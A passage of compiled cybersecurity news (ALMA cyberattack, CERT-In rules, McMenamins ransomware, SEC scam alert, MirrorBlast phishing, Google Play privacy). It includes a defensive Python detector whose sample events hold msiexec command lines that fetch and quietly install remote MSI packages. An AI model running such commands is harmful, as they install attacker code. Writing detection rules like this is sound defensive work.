Even though it wants to serve as a platform for the entire supply chain, it will continue to collaborate with businesses like Accenture, Avanade, EY, KPMG, PwC, and TCS. Data from standalone supply chain systems, SAP and Oracle ERP systems, Dynamics 365, and other systems will be fed into the Microsoft Supply Chain Center.

Data ingestion for supply chain visibility is made possible via the Supply Chain Center's Data Manager capability. FedEx, FourKites, Overhaul, and C.H. Robinson are some of the partners in the preview launch. The supply and demand insights module, the order management module, the built-in Teams connection, and partner modules within the center are just a few of the prebuilt modules that the Supply Chain Center provides to solve supply chain disruptions.

According to Microsoft, the data remains consistent regardless of the module used because the center runs on a Dataverse common data service environment, eliminating the need to check which reports have the most recent data.

The ALMA Observatory has Suspended Operations due to a Cyberattack

 

Following a cyberattack on Saturday, October 29, 2022, the Atacama Large Millimeter Array (ALMA) Observatory in Chile has suspended all astronomical observation operations and taken its public website offline. 

Email services are currently limited at the observatory, and IT specialists are working to restore the affected systems. The organization announced the security incident on Twitter yesterday, saying that given the nature of the incident, it is impossible to predict when normal operations will resume.

The observatory also stated that the attack did not compromise the ALMA antennas or any scientific data, indicating that no unauthorized data access or exfiltration occurred. In an attempt to learn more about the security incident, BleepingComputer contacted ALMA Observatory, and a spokesperson shared the following comment:

"We cannot further discuss the details as there is an ongoing investigation. Our IT team was prepared to face the situation and had the proper infrastructure, although there is no flawless defense against hackers. We are still working hard on the full recovery of services. Thanks for your understanding." - ALMA Observatory.

The ALMA observatory is made up of 66 high-precision radio telescopes of 12 m diameter arranged in two arrays and is located on the Chajnantor plateau at an elevation of 5,000 m (16,400 ft). The project cost $1.4 billion, making it the most expensive ground telescope in the world, and it was created through a collaborative effort involving the United States, Europe, Canada, Japan, South Korea, Taiwan, and Chile.

Since reaching normal operational status in 2013, ALMA has contributed to pioneering comet and planetary formation studies, participated in the Event Horizon project to photograph a black hole for the first time in history, and detected the biomarker 'phosphine' in Venus' atmosphere.

The observatory is used by scientists from the National Science Foundation, the European Southern Observatory, the National Astronomical Observatory of Japan, and other organizations from around the world, so any interruption in operations has ramifications for multiple science teams and ongoing projects.

For the time being, users should keep an eye out for status updates on the NRAO's website or the ALMA Observatory's social media channels. Observers can seek assistance from the organization by using this online portal.

All Organisations Must Report Cybersecurity Breaches Within 6 Hours: CERT-In

 

CERT-In, India's computer emergency response team, released new guidelines on Thursday that mandate that service providers, intermediaries, data centres, and government institutions disclose cybersecurity incidents, including data breaches, within six hours.

The government said in a release, "Any service provider, intermediary, data center, body corporate and Government organization shall mandatorily report cyber incidents [...] to CERT-In within six hours of noticing such incidents or being brought to notice about such incidents."

Compromise of critical systems, targeted scanning, unauthorised access to computers and social media accounts, website defacements, malware deployments, identity theft, DDoS attacks, data breaches and leaks, rogue mobile apps, and attacks against servers and network appliances such as routers and IoT devices are among the types of incidents covered.

The government stated it was taking these steps to ensure that the required indicators of compromise (IoC) associated with security events are easily accessible to "carry out the analysis, investigation, and coordination as per the process of the law."

According to the guidelines, concerned organisations are also required to synchronise ICT system clocks to the National Informatics Centre (NIC) or National Physical Laboratory (NPL) Network Time Protocol (NTP) Server and to maintain ICT system logs for a rolling period of 180 days. VPN service providers are required to maintain data such as names, addresses, phone numbers, emails, and IP addresses of subscribers for a minimum of five years.

The guidelines also require virtual asset service, exchange, and custodian wallet providers to preserve records on Know Your Customer (KYC) and financial transactions for a period of five years, starting in 60 days.

India's Ministry of Electronics and Information Technology (MeitY) said in a statement, "These directions shall enhance overall cyber security posture and ensure safe and trusted Internet in the country."

McMenamins Struck by Ransomware Attack, Employee Data at Risk

 

McMenamins, a Portland hotel and brewpub chain, was struck by a ransomware attack on Wednesday that may have stolen employees' personal information, but no customer payment information seems to have been compromised. 

The ransomware attack was discovered and stopped on December 12, according to McMenamins. The company stated it alerted the FBI and contacted a cybersecurity firm to figure out where the attack came from and how extensive it was. 

Employee data such as names, residences, dates of birth, Social Security numbers, direct deposit bank account information, and benefits records may have been acquired, according to the firm in a news release, but "it is not currently known whether that is the case." 

"To provide employees with peace of mind, McMenamins will be offering employees identity and credit protection services, as well as a dedicated helpline through Experian," the company stated. "A payment processing service manages the collection of such information. Further, this information is not stored on company computer systems impacted by the attack."  

Many operational systems have been taken offline, including credit card scanners, necessitating temporary alterations in payment procedures at some McMenamins sites. There is "no indication" that consumer payment data has been hacked, according to the firm. 

Co-owner Brian McMenamin stated, “What makes this breach especially disheartening is that it further adds to the strain and hardship our employees have been through in the past two years.” 

“We ask that our customers give our employees extra grace as we make temporary adjustments in the way we process transactions and reservations, given the impacts to our systems by this breach.” 

The company stated that it is unclear when the problem would be rectified and systems restored. There are a few things firms can do to help mitigate these attacks, according to Kerry Tomlinson, a cyber news reporter with Ampere News. 

"As a business, you need to have backups," Tomlinson said. "If ransomware hits and they're demanding ransom for you to get your files back, you can say thanks a lot but I already have backups." 

"It will happen more and more and it's only going to get bigger. If you're not paying attention now, you need to pay attention." 

Employees should be especially cautious to help prevent cyber assaults, according to Tomlinson, by avoiding questionable emails, setting unique passwords for each website visited, and adding a multi-factor authentication process to offer an extra layer of security. It is worth noting that despite the breach, all McMenamins locations are open.

US SEC Alerts Investors of Ongoing Fraud

 

The Securities and Exchange Commission (SEC) is alerting investors about scammers posing as SEC officials and attempting to mislead them. 

Fraudsters are contacting investors via phone calls, voicemails, emails, and letters, according to the SEC's Office of Investor Education and Advocacy (OIE). 

The alert stated, “We are aware that several individuals recently received phone calls or voicemail messages that appeared to be from an SEC phone number. The calls and messages raised purported concerns about unauthorized transactions or other suspicious activity in the recipients’ checking or cryptocurrency accounts. These phone calls and voicemail messages are in no way connected to the Securities and Exchange Commission.” 

The SEC warned that it never asks for payments linked to enforcement activities, offers to confirm trades, or seeks sensitive personal and financial information in unsolicited communication, including emails and letters. It further stated that SEC officials will not inquire about shareholdings, account numbers, PINs, passwords, or other personal information. 

Scammers appear to be employing a growing number of strategies in order to boost their chances of success. Investors should not disclose any personal information if they get communication that seems to be from the Securities and Exchange Commission, as per the notice. They are encouraged to contact the commission directly.

Investors can use the SEC's personnel locator at (202) 551-6000, call (800) SEC-0330, or email help@SEC.gov to confirm the identity of people behind calls or messages. Investors can also register a complaint with the Securities and Exchange Commission's Office of Inspector General by visiting www.sec.gov/oig or calling (833) SEC-OIG1 (732-6441). 

Further, the alert stated, “Beware of government impersonator schemes. Con artists have used the names of real SEC employees and email messages that falsely appear to be from the Securities and Exchange Commission to trick victims into sending the fraudsters money. Impersonation of US Government agencies and employees (as well as of legitimate financial services entities) is one common feature of advance fee solicitations and other fraudulent schemes. Even where the fraudsters do not request that funds be sent directly to them, they may use personal information they obtain to steal an individual’s identity or misappropriate their financial assets.”

This New Phishing Attack Uses a Weaponized Excel File

 

A new phishing campaign is targeting financial sector employees by using links to download a ‘weaponized’ Excel document.

MirrorBlast, a phishing effort, was discovered in early September by security firm ET Labs. Morphisec, a fellow security firm, has now studied the malware and warns that the malicious Excel files might escape malware-detection systems due to "extremely lightweight" embedded macros, making it especially risky for businesses that rely on detection-based protection and sandboxing. 

Macros, or scripts for automating activities, have grown in popularity among cybercriminals. Despite the fact that macros are disabled by default in Excel, attackers employ social engineering to deceive potential victims into allowing macros. Despite appearing to be a simple approach, macros have been employed by state-sponsored hackers because they frequently work. 

Earlier this year, Microsoft extended its Antimalware Scan Interface (AMSI) for antivirus to combat the rise in macro malware and a recent trend among attackers of using outdated Excel 4.0 XLM macros (rather than newer VBA macros) to circumvent anti-malware systems. 

As per Morphisec, the MirrorBlast attack chain is similar to tactics used by TA505, a well-established, financially focused Russia-based cybercriminal group. The group has been active since at least 2014 and is well-known for its usage of a wide range of tools. 

Morphisec researcher Arnold Osipov stated in a blog post, "TA505 is most known for frequently changing the malware they use as well as driving global trends in malware distribution." 

While the MirrorBlast attack begins with a document attached to an email, it afterwards uses a Google feed proxy URL with a SharePoint and OneDrive trap that masquerades as a file-sharing request. When the user clicks the URL, they are sent to a hacked SharePoint site or a bogus OneDrive site. Both versions lead to the malicious Excel document. 

The sample MirrorBlast email demonstrates how the attackers are capitalising on company-issued data on COVID-related modifications to working conditions. Morphisec points out that due to compatibility issues with ActiveX components, the macro code can only be run on a 32-bit version of Office. The macro itself runs a JavaScript script meant to avoid sandboxing by determining if the computer is in administrator mode. The msiexec.exe process is then launched, which downloads and installs an MSI package. 

Morphisec discovered two MSI installer versions that employed legitimate scripting tools named KiXtart and REBOL. The KiXtart script transmits information about the victim's workstation to the attacker's command and control server, including the domain, computer name, user name, and process list. The server then answers with a number indicating whether the Rebol version should be used. Morphisec states that the Rebol script leads to a remote access tool called FlawedGrace, which the group has previously utilised. 

Osipov added, "TA505 is one of many financially motivated threat groups currently active in the marketplace. They are also one of the most creative, as they have a tendency to constantly shift the attacks they leverage to achieve their goals." 
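A defender-side check for the step described above, where an Office macro or script ends with msiexec.exe fetching an MSI package from a remote server. This is an added example, not code from Morphisec or the original post; the event field names, host names and URLs are constructed, and the parent-process list is an assumption to tune per environment.

```python
import re
from pathlib import PureWindowsPath

# Assumption: parents with no routine reason to start an installer
# (Office applications and Windows script hosts). Tune for your estate.
SUSPICIOUS_PARENTS = {"excel.exe", "winword.exe", "wscript.exe",
                      "cscript.exe", "mshta.exe"}

# A URL on the msiexec command line means the package is fetched remotely.
URL_RE = re.compile(r"https?://[^\s\"']+", re.IGNORECASE)
# Quiet switches (/q, /qn, /qb, /qr, /quiet) hide the installer UI from the user.
QUIET_RE = re.compile(r"(?:^|\s)[/-](?:q[nbr]?|quiet)(?=\s|$)", re.IGNORECASE)

# Constructed process-creation events (Sysmon Event ID 1 style); not real telemetry.
SAMPLE_EVENTS = [
    {"host": "FIN-WS01",
     "parent": r"C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE",
     "image": r"C:\Windows\SysWOW64\msiexec.exe",
     "cmdline": "msiexec.exe /i http://files.example.invalid/update.msi /qn"},
    {"host": "FIN-WS02",
     "parent": r"C:\Windows\SysWOW64\wscript.exe",
     "image": r"C:\Windows\SysWOW64\msiexec.exe",
     "cmdline": 'msiexec.exe /i "https://cdn.example.invalid/pkg.msi"'},
    # Benign: user double-clicks a local MSI from Explorer.
    {"host": "FIN-WS03",
     "parent": r"C:\Windows\explorer.exe",
     "image": r"C:\Windows\System32\msiexec.exe",
     "cmdline": r'msiexec.exe /i "C:\Users\alice\Downloads\setup.msi"'},
    # Not matched by this rule: Office parent but a local package, no URL.
    {"host": "FIN-WS04",
     "parent": r"C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXE",
     "image": r"C:\Windows\System32\msiexec.exe",
     "cmdline": r"msiexec.exe /i C:\Temp\addin.msi"},
    # Benign: a management service installs quietly from an internal URL.
    {"host": "FIN-WS05",
     "parent": r"C:\Windows\System32\services.exe",
     "image": r"C:\Windows\System32\msiexec.exe",
     "cmdline": "msiexec.exe /i https://deploy.example.invalid/agent.msi /quiet"},
]


def basename(path):
    """Lower-cased file name of a Windows path, on any host OS."""
    return PureWindowsPath(path).name.lower()


def find_remote_msi_installs(events):
    """Return msiexec launches with a remote URL started by a suspicious parent."""
    findings = []
    for ev in events:
        if basename(ev["image"]) != "msiexec.exe":
            continue
        parent = basename(ev["parent"])
        if parent not in SUSPICIOUS_PARENTS:
            continue
        url = URL_RE.search(ev["cmdline"])
        if url is None:
            continue
        findings.append({
            "host": ev["host"],
            "parent": parent,
            "url": url.group(0),
            # A hidden install is a stronger signal than an interactive one.
            "quiet": bool(QUIET_RE.search(ev["cmdline"])),
        })
    return findings


if __name__ == "__main__":
    for f in find_remote_msi_installs(SAMPLE_EVENTS):
        print(f)
```
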

Google: Android Apps Must Provide Privacy Information By April 2022

 


A few days ago, Google announced that it is about to launch its Google Play ‘Safety Section’ feature, which will provide information regarding the data collected and used by an Android app. Now Google has announced more details about the upcoming feature. 

Under the new policy, app developers have to share the details — what information apps collect, how collected data is used, and what privacy/security features the apps utilize. The upcoming feature will be available in the first quarter of 2022 and will be displayed on the app itself. 

With the feature, customers will be able to see all security- and privacy-related information, including what data is shared with third parties, whether an app uses data encryption, follows Google's Families policies, or whether it has been independently audited against global security standards. Following the announcement, Google will also provide the timeline to app developers: when they will be able to submit information and when customers can see the Safety section. It has also given the deadline for app developers to provide the information. 

What is the timeline for App Developers? 

According to Google, the policy will take effect in the first week of October 2021, when "App privacy & security" will be displayed on an app's content page on Play Console. Developers will then be able to complete a questionnaire on data collection, security features, and the app's privacy policy. However, the whole procedure will be completed in April 2022. 

What must be disclosed under this feature? 

• Encryption in transit 
• Deletion mechanism 
• Families policy 
• Independent security review 
• How data is collected 

Some of the data types that app developers must disclose include personal information like user name, phone number, and email address, location data like users' approximate or precise location, financial info like user credit card number and bank account number, Health and fitness information, Storage like files and docs, emails or texts, audio files like sound recordings and music files, calendar information, App performance like crash logs and performance diagnostics, and Identifiers like device id.